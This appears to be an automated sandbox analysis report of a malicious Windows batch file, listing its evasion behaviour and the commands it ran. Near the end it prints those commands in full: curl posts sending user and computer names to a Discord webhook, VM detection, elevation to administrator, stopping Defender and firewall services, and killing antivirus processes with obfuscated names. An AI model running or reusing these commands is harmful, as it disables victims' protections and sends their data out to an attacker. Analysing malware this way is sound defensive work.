        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Windows\explorer.exe System information queried: FirmwareTableInformation
        Source: C:\Windows\explorer.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4089
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5812
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3157
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2472
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3060
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1504
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3244
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5360
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4413
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2767
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1457
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5996
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 649
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1727
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1764
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1141
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3495
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1496
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2366
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1333
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\Public\Documents\Secret Document\exe.exe
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5848 Thread sleep count: 4089 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5848 Thread sleep count: 5812 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6372 Thread sleep time: -11990383647911201s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6168 Thread sleep count: 3157 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164 Thread sleep count: 2472 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1036 Thread sleep time: -3689348814741908s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1444 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3712 Thread sleep count: 3060 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3712 Thread sleep count: 1504 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6108 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4032 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3284 Thread sleep count: 3244 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6960 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3284 Thread sleep count: 301 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5288 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716 Thread sleep count: 5360 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716 Thread sleep count: 4413 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5616 Thread sleep time: -3689348814741908s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6476 Thread sleep count: 2767 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6100 Thread sleep count: 1457 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5736 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4568 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3428 Thread sleep count: 5996 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3552 Thread sleep count: 649 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7108 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3164 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2688 Thread sleep count: 1727 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5276 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6872 Thread sleep count: 1764 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5408 Thread sleep count: 1141 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6464 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6840 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 4216 Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5244 Thread sleep count: 3495 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088 Thread sleep time: -8301034833169293s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5244 Thread sleep count: 1496 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5448 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6132 Thread sleep count: 2366 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6816 Thread sleep time: -6456360425798339s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4004 Thread sleep count: 1333 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3752 Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6496 Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
        Source: C:\Windows\System32\curl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
        Source: C:\Windows\System32\curl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
        Source: C:\Windows\System32\curl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
        Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_ComputerSystem
        Source: C:\Windows\System32\curl.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: explorer.exe, 00000017.00000003.2356968286.000000000BE2A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000017.00000002.2716909048.000000000BC22000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
        Source: explorer.exe, 00000017.00000002.2699218188.0000000001453000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000(
        Source: explorer.exe, 00000017.00000002.2716909048.000000000BC22000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}D
        Source: explorer.exe, 00000017.00000003.2345423568.000000000BD1C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000@v
        Source: explorer.exe, 00000017.00000002.2716909048.000000000BC22000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
        Source: explorer.exe, 00000017.00000002.2709660093.0000000009002000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
        Source: explorer.exe, 00000017.00000002.2709660093.0000000008F54000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWystem32\DriverStore\en-GB\machine.inf_loc
        Source: explorer.exe, 00000017.00000002.2709660093.0000000009002000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NXTVMWare
        Source: explorer.exe, 00000017.00000003.2305115462.0000000009002000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2335332285.00000000091B2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2305220290.00000000091B2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2304007048.00000000091B2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2328373122.00000000091B2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2308846586.00000000091B2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2709660093.00000000091B2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2618054008.00000000091B2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2306435911.00000000091B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2708404298.000001774F258000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
        Source: explorer.exe, 00000017.00000003.2365894508.000000000BD1C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000h
        Source: explorer.exe, 00000017.00000003.2365894508.000000000BCDA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
        Source: explorer.exe, 00000017.00000002.2716909048.000000000BC22000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
        Source: explorer.exe, 00000017.00000003.2346304263.000000000BC2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.exe[
        Source: explorer.exe, 00000017.00000003.2308846586.0000000009172000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2618054008.000000000913A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2305420089.0000000009171000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2306435911.0000000009172000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2335332285.0000000009157000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2328373122.0000000009157000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2304007048.0000000009157000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2709660093.000000000913A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
        Source: explorer.exe, 00000017.00000002.2716909048.000000000BC22000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000mu
        Source: svchost.exe, 00000019.00000002.2703555050.000001774DC2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
        Source: explorer.exe, 00000017.00000002.2699218188.0000000001453000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
        Source: curl.exe, 00000003.00000002.1448116092.00000144AEF17000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.1447719589.00000144AEF14000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000003.1461699248.000001F8D32F5000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000018.00000003.2265104443.00000189419E4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001C.00000003.2285772537.00000219E6793000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001C.00000002.2287844080.00000219E6795000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: explorer.exe, 00000017.00000003.2365894508.000000000BD1C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000017.00000002.2709660093.0000000009002000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
        Source: explorer.exe, 00000017.00000002.2709660093.0000000009002000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JVMware Virtual disk SCSI Disk Device
        Source: explorer.exe, 00000017.00000002.2716909048.000000000BBCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000N
        Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion

        Source: Yara match File source: main.bat.bin.bat, type: SAMPLE
        Source: Yara match File source: amsi64_6104.amsi.csv, type: OTHER
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -s -H "Content-Type: application/json" -d "{\"content\":\"User: user, Computer: user-PC\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer,model
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "vmware virtualbox"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -s -H "Content-Type: application/json" -d "{\"content\":\"YAY user, Computer: user-PC\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net session
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent()); if (-not $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Start-Process -FilePath 'cmd.exe' -ArgumentList '/c C:\Users\user\Desktop\main.bat.bin.bat' -Verb RunAs -WindowStyle Hidden; exit }; $process = Get-Process -Id $PID; $process.PriorityClass = 'High'; $process.ProcessorAffinity = 1; $process.PriorityBoostEnabled = $true"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$s = @('SDRSVC','WinDefend','security center','wuauserv','Windows Defender Service','Windows Firewall','sharedaccess'); foreach ($service in $s) { Stop-Service -Name $service -Force -ErrorAction SilentlyContinue }"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$processes = @('mbam', 'mbamservice', 'avastsvc', 'avastui', 'avp', 'avgui', 'bdagent', 'bddownloader', 'bdredline', 'bdss', 'bdservicehost', 'bdnagent', 'bdscan', 'bdcore'); foreach ($p in $processes) { Stop-Process -Name $p -Force -ErrorAction SilentlyContinue }"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$s='taskkill /F /IM'; $p=@('m'+'bam.exe','mbam'+'service.exe','avast'+'svc.exe','avast'+'ui.exe','a'+'vp.exe','avg'+'ui.exe','bd'+'agent.exe','bddownloader.exe','bdre'+'dline.exe','bd'+'ss.exe','bdserv'+'icehost.exe','bdnagent.exe','bds'+'can.exe','bdc'+'ore.exe'); foreach($i in $p){iex \"$s \"$i\"\"};"
